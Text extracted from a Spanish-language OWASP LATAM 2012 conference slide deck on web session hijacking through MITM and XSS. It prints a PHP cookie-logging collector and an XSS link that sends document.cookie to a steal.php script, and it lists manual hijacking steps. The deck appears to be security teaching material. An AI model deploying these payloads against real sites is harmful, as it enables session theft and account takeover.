Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Hijacking PDF
Hijacking PDF
Este documento es publicado bajo la licencia Creative Commons Attribution ShareAlike 3.0.
Para cualquier reutilización o distribución, usted debe dejar en claro a otros los términos de
la licencia sobre este trabajo.
http://www.facebook.com/El.Palomo.Seguridad.Informacion
OWASP LATAM TOUR 2012
INDICE
1. Introducción
• ¿Qué es el session hijacking?
• Objetivo de la presentación
• Ejercicio 1: Demostración de la facilidad del robo de sesiones
2. ¿Soy vulnerable?
• Técnicas y métodos de explotación
• Escenarios de ataque:
• Ejercicio 2: Hombre en el medio (MiTM)
• Ejercicio 3: Cross Site Scripting (XSS)
5. Conclusiones
IMPORTANCIA
El usuario ha ingresado
2
El atacante encuentra un
mecanismo para
Importante: averiguar el identificador de
El usuario (la víctima) no se entera que su sesión SESIÓN y realizar el secuestro
de la sesión del usuario.
de aplicación web ha sido vulnerada.
1
1. El usuario malicioso prepara un
servidor web externo para
almacenar las sesiones.
2. El usuarios malicioso coloca
código JavaScript sobre la App.
Importante: Web Vulnerable.
Un usuario perspicaz puede darse cuenta de la
inserción de código malicioso en la página web. 9
OWASP LATAM TOUR 2012
Secuestro de Herramientas
¿Cómo funciona el Conclusiones y
sesiones de de secuestro de
secuestro de sesiones? contramedidas
forma manual sesiones
<?php
Funcionamiento: Cross Site Scripting
$session = $_GET["cookie"];
$date = date("l ds of F Y h:i:s A");
$user_agent =
$_SERVER['HTTP_USER_AGENT'];
$file = fopen('log.txt','a');
fwrite($file, "DATE: $date || USER
AGENT: $user_agent || COOKIE:
$session \n");
fclose($file);
header("Location:
http://XXXXXXX/hijacking/listado.php");
1
?>
<a href="#"
onClick=document.location="htt
p://192.168.1.48/steal.php?cook
ie="+escape(document.cookie);>
Ver aqui los detalles</a>
Importante:
Un usuario perspicaz puede darse cuenta de la inserción de
código malicioso en la página web. 10
OWASP LATAM TOUR 2012
Secuestro de Herramientas
¿Cómo funciona el Conclusiones y
sesiones de de secuestro de
secuestro de sesiones? contramedidas
forma manual sesiones
¿Por qué sucede esto? Cuando el usuario ingresa a una página web:
Vamos a la práctica
Aplicación web PHP :
1. Capturamos la sesión mediante la técnica de hombre en el
medio.
2. Identificamos la cookie y el número de sesión.
3. Modificamos la cookie mediante una herramienta: Advanced
Cookie Manager.
4. Accedemos a la aplicación sin usuario ni contraseña.
1. El atacante realiza un
ataque para conseguir la
sesión del usuario
(MITM).
2. Firesheep coge el
identificador de sesión y
te permite ingresar a la
aplicación de la manera
más fácil y sencilla.